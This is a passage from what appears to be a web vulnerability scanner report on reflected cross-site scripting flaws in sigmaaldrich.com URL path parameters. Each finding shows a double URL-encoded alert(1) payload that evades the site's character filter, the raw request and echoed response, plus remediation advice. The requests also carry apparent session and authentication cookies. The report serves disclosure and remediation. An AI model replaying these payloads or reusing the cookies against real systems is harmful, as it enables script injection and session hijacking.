Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestbea8c";alert(1)//eba22e09a28/programs","E404") ;
   </script>
...[SNIP]...

1.140. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/programs [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/programs

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77902%2522%253balert%25281%2529%252f%252fb5ed9d6d895 was submitted in the REST URL parameter 4. This input was echoed as 77902";alert(1)//b5ed9d6d895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will have already carried out one decode; it is this second decode that turns the %22 the filter let through back into a quotation mark after validation has run. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should escape the value for the JavaScript string context on output (quotation marks, backslashes and forward slashes, so that a reflected </script> cannot close the block) rather than rely on a character blacklist.

Request

GET /content/sigma-aldrich/areas-of-interest/programs77902%2522%253balert%25281%2529%252f%252fb5ed9d6d895 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:51 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/programs77902";alert(1)//b5ed9d6d895","E404") ;
   </script>
...[SNIP]...

1.141. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb960%2522%253balert%25281%2529%252f%252f5dd6c2ad38f was submitted in the REST URL parameter 1. This input was echoed as eb960";alert(1)//5dd6c2ad38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; it is this second decode that turns the %22 the filter let through back into a quotation mark after validation has run. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should escape the value for the JavaScript string context on output (quotation marks, backslashes and forward slashes, so that a reflected </script> cannot close the block) rather than rely on a character blacklist.

Request

GET /contenteb960%2522%253balert%25281%2529%252f%252f5dd6c2ad38f/sigma-aldrich/customer-support/customer-service/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenteb960";alert(1)//5dd6c2ad38f/sigma-aldrich/customer-support/customer-service/about-us","E404") ;
   </script>
...[SNIP]...

1.142. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc060%2522%253balert%25281%2529%252f%252f7e103f95f12 was submitted in the REST URL parameter 2. This input was echoed as fc060";alert(1)//7e103f95f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; it is this second decode that turns the %22 the filter let through back into a quotation mark after validation has run. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should escape the value for the JavaScript string context on output (quotation marks, backslashes and forward slashes, so that a reflected </script> cannot close the block) rather than rely on a character blacklist.

Request

GET /content/sigma-aldrichfc060%2522%253balert%25281%2529%252f%252f7e103f95f12/customer-support/customer-service/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichfc060";alert(1)//7e103f95f12/customer-support/customer-service/about-us","E404") ;
   </script>
...[SNIP]...

1.143. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edecd%2522%253balert%25281%2529%252f%252f41673377967 was submitted in the REST URL parameter 3. This input was echoed as edecd";alert(1)//41673377967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supportedecd%2522%253balert%25281%2529%252f%252f41673377967/customer-service/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supportedecd";alert(1)//41673377967/customer-service/about-us","E404") ;
   </script>
...[SNIP]...

1.144. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10095%2522%253balert%25281%2529%252f%252f531c73a07c2 was submitted in the REST URL parameter 4. This input was echoed as 10095";alert(1)//531c73a07c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service10095%2522%253balert%25281%2529%252f%252f531c73a07c2/about-us HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
